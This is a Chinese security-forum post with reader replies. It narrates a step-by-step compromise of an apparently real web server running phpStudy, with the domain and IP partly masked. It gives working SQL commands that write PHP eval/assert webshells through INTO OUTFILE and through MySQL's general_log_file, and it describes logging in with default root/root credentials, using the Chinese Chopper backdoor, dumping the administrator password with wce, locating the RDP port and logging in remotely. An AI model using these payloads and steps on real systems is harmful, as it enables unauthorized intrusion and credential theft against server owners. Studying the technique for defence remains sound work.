用户
搜索
  • TA的每日心情
    开心
    2017-9-27 10:37
  • 签到天数: 24 天

    连续签到: 1 天

    [LV.4]经常看看II

    i春秋-核心白帽

    关注信息安全

    Rank: 4

    251

    主题

    740

    帖子

    3872

    魔法币
    收听
    2
    粉丝
    26
    注册时间
    2016-2-1

    秦春秋游侠核心白帽i春秋签约作者

    发表于 2017-4-26 08:09:44 2960487

    投稿作者:simeon ,本人代发文章,作者在本帖8楼!
    本文原创作者:simeon,本文属i春秋原创奖励计划,未经许可禁止转载!


    在前面的phpmyadmin漏洞利用专题中介绍了如何通过root账号来获取webshell,但在现实情况中,由于Mysql版本较高以及配置文件的缘故,往往无法直接通过root账号写入网站真实路劲下获取webshell;通过研究发现其实可以通过一些方法绕过,同样可以获取webshell,下面将整个渗透过程和方法跟大家分享。

    1.信息收集

       目标站点访问其子域名,如图1所示,发现该站点是使用phpStudy2014搭建的,通过phpinfo信息泄露,可以获取网站的绝对路径“D:/phpStudy/WWW”,服务器为Windows Server 2003 ,phpstudy探针文件“D:/phpStudy/WWW/l.php”。

    图片1.png
    图1获取网站真实路劲等信息

    2.获取root账号和密码
       phpStudy默认账号为root/root,使用其进行登录,成功登录系统,如果不是这个账号和密码,可以使用phpmyadmin暴力破解工具进行暴力破解,如图2所示,登录后看目前使用的数据应该是www数据库。查看mysql数据库中的user表中的数据,如图3所示,清一色的相同密码。

    图片2.png
    图2获取root账号和密码

    图片3.png
    图3 mysql数据库user表多个账号使用相同密码

    3.直接导出webshell失败
       既然知道了网站真实路径“D:/phpStudy/WWW”和root账号,最简单的方法就是直接导出webshell:
    select '<?php @eval($_POST[cmd]);?>'INTO OUTFILE 'D:/phpStudy/WWW/cmd.php',如图4所示,在以往是顺利成章的获取webshell,但这次显示错误信息:

    [AppleScript] 纯文本查看 复制代码
    The MySQL server is running with the --secure-file-priv option so it cannot execute this statement

    意思是Mysql服务器运行“--secure-file-priv”选项,所以不能执行这个语句。

    图片4.png
    图4导出webshell失败

    4. secure_file_priv选项

       在mysql中使用secure_file_priv配置项来完成对数据导入导出的限制,前面的webshell导出就是如此,在实际中常常使用语句来导出数据表内容,例如把mydata.user表的数据导出来:

    [AppleScript] 纯文本查看 复制代码
    select * from mydata.user into outfile '/home/mysql/user.txt'; 

    在mysql的官方给出了“--secure-file-priv=name Limit LOAD DATA, SELECT ... OUTFILE, and LOAD_FILE() to files within specified directory”解释,限制导出导入文件到指定目录,其具体用法:

    (1)限制mysqld不允许导入和导出
    [AppleScript] 纯文本查看 复制代码
         mysqld --secure_file_prive=null
    (2)限制mysqld的导入和导出只能发生在/tmp/目录下
    [AppleScript] 纯文本查看 复制代码
         mysqld --secure_file_priv=/tmp/
    (3)不对mysqld 的导入和导出做限制,在/etc/my.cnf文件中不指定值。

    5.通过general_log和general_log_file来获取webshell

       mysql打开general log之后,所有的查询语句都可以在general log文件中以可读的方式得到,但是这样general log文件会非常大,所以默认都是关闭的。有的时候为了查错等原因,还是需要暂时打开general log的。换句话说general_log_file会记录所有的查询语句,以原始的状态来显示,如果将general_log开关打开,general_log_file设置为一个php文件,则查询的操作将会全部写入到general_log_file指定的文件,通过访问general_log_file指定的文件来获取webshell。在mysql中执行查询:

    [AppleScript] 纯文本查看 复制代码
    set global general_log='on';
    SET global general_log_file='D:/phpStudy/WWW/cmd.php';
    SELECT '<?php assert($_POST["cmd"]);?>';

       如图5,图6和图7所示,分别打开general_log开关,设置general_log_file文件,执行查询。

    图片5.png
    图5打开general_log开关
    图片6.png
    图6设置general_log_file文件
    图片7.png
    图7执行webshell查询


    6.获取webshell

       在浏览器中打开地址http://******.hy******.cn/cmd.php,如图8所示,会显示mysql查询的一些信息,由于一句话后门通过查询写入了日志文件cmd.php,因此通过中国菜刀一句话后门可以成功获取webshell,如图9所示。

    图片8.png
    图8查看文件
    图片9.png
    图9获取webshell

    7.服务器密码获取

      (1)查看服务器权限及用户权限
      通过中国菜刀一句话后门管理工具,打开远程终端命令执行,如图10所示,分别执行“whomai”、“net user”、“net localgroup administrator”命令来查看当前用户的权限,当前系统所有用户,管理员用户情况。
    图片10.png
    图10查看当前用户权限
    (2)上传wce密码获取工具
        直接执行g86.exe顺利获取管理员密码,如图11所示,开始执行g64.exe没有成功是因为系统是32位操作系统。
    11.png
    图11获取管理员密码

    8.获取远程终端端口

      通过命令 tasklist /svc | find "TermService"及netstat -ano | find "1792" 命令来获取当前的3389端口为8369端口,tasklist /svc | find "TermService"获取的是远程终端服务对应的进程号,netstat -ano | find "1792"查看进程号1792所对应的端口,在实际过程中1792值会有变化。
    12.png
    图12获取3389端口

    9.登录3338

      打开mstsc,在连接地址中输入202.58.***.***:8369,输入获取的管理员和密码进行登录,如图13所示,成功登录服务器。

    图片13.png
    图13登录3389

    10.总结

    (1)查看genera文件配置情况
    [AppleScript] 纯文本查看 复制代码
    show global variables like "%genera%";
    (2)关闭general_log
    [AppleScript] 纯文本查看 复制代码
    set global general_log=off;
    (3)通过general_log选项来获取webshell
    [AppleScript] 纯文本查看 复制代码
    set global general_log='on';
    SET global general_log_file='D:/phpStudy/WWW/cmd.php';
    SELECT '<?php assert($_POST["cmd"]);?>';


    评分

    参与人数 1魔法币 +1 收起 理由
    大高 + 1 欢迎分析讨论交流,i春秋论坛有你更精彩!.

    查看全部评分

    本帖被以下淘专辑推荐:

    我是坏蛋的小号
    坏蛋 管理员 欢迎大家来春秋群找我玩
    来自 27#
    发表于 2017-5-8 16:55:20
    文章奖励介绍及评分标准:http://bbs.ichunqiu.com/thread-7869-1-1.html,如有疑问请加QQ:286894635!

    奖金
    点评
    100
    融合了很多思路和技巧,非常具有实战意义,不错。

    欢迎加入i春秋QQ群大家庭,每人只能任选加入一个群哦!
    投稿请加QQ:780876774。

    i春秋—楚:713729706
    i春秋—魏:687133802
    网安交流群:820783253
    使用道具 举报 回复
    发表于 2017-4-26 11:59:33
    表哥,请教一个问题。不对mysqld 的导入和导出做限制,在/etc/my.cnf文件中不指定值。但是我怎么找不到这个文件呢?phpstudy20161103版本的。 QQ图片20170426115825.png 安装在f盘的,发现并不能找到,c盘也找了,还是没有,请问是什么原因呢?

    使用道具 举报 回复
    坏蛋 管理员 欢迎大家来春秋群找我玩
    推荐
    发表于 2017-4-26 14:28:22
    w_uai 发表于 2017-4-26 11:59
    表哥,请教一个问题。不对mysqld 的导入和导出做限制,在/etc/my.cnf文件中不指定值。但是我怎么找不到这个 ...


    这是针对linux,windows mysql去找my.ini
    欢迎加入i春秋QQ群大家庭,每人只能任选加入一个群哦!
    投稿请加QQ:780876774。

    i春秋—楚:713729706
    i春秋—魏:687133802
    网安交流群:820783253
    使用道具 举报 回复
    那是英雄之见略同,如果使用相同的技术就是雷同,我无法可说。你去搜索,我是做了phpmyadmin整个漏洞的一个体系,还有一个mysql的高级用法,请见附件!

    MySQL_OOB_Hacking.pdf

    1.03 MB, 下载次数: 92, 下载积分: 魔法币 -5

    做攻防实战安全理论体系建设
    http://blog.51cto.com/simeon
    安天365技术交流2群: 647359714
    使用道具 举报 回复
    坏蛋 管理员 欢迎大家来春秋群找我玩
    推荐
    发表于 2017-4-26 14:52:02
    Qingxuan 发表于 2017-4-26 14:33
    https://zhuanlan.zhihu.com/p/25957366 这个文章与你内容雷同,给个说法?

    作者已回复
    欢迎加入i春秋QQ群大家庭,每人只能任选加入一个群哦!
    投稿请加QQ:780876774。

    i春秋—楚:713729706
    i春秋—魏:687133802
    网安交流群:820783253
    使用道具 举报 回复
    发表于 2017-7-28 19:48:36
    很好的一篇文章,我对于拿webshell这个一直是难题,刚好弱口令拿到一个phpmyadmin的数据库,等会尝试一下,谢谢了。
    使用道具 举报 回复
    发表于 2017-4-29 18:55:29
    Linux 执行SET global general_log_file='var/www/html/cmd.php';这句时,出现:#1231 Variable.......错误,是咱们回事
    使用道具 举报 回复
    发表于 2017-4-26 15:20:04
    icq8756c1a2 发表于 2017-4-26 14:27
    这是针对linux,windows mysql去找my.ini

    解决,就是这个问题!
    使用道具 举报 回复
    mark
    使用道具 举报 回复
    支持表哥
    使用道具 举报 回复
    发表于 2017-4-26 10:51:33
    学习了,,好姿势,,
    使用道具 举报 回复
    发表于 2017-4-26 14:27:50
    这是针对linux,windows mysql去找my.ini
    做攻防实战安全理论体系建设
    http://blog.51cto.com/simeon
    安天365技术交流2群: 647359714
    使用道具 举报 回复
    发表于 2017-4-26 14:33:34
    https://zhuanlan.zhihu.com/p/25957366 这个文章与你内容雷同,给个说法?
    AAAA
    使用道具 举报 回复
    发表于 2017-4-26 14:53:02
    土司早发了 不知道是不是一个人
    使用道具 举报 回复
    20170426150001.jpg
    发张一直在做的事情。
    做攻防实战安全理论体系建设
    http://blog.51cto.com/simeon
    安天365技术交流2群: 647359714
    使用道具 举报 回复
    做攻防实战安全理论体系建设
    http://blog.51cto.com/simeon
    安天365技术交流2群: 647359714
    使用道具 举报 回复
    请说雷同的人去论文检索中进行核实。谢谢。看看有多少重复的部分。
    做攻防实战安全理论体系建设
    http://blog.51cto.com/simeon
    安天365技术交流2群: 647359714
    使用道具 举报 回复
    12下一页
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册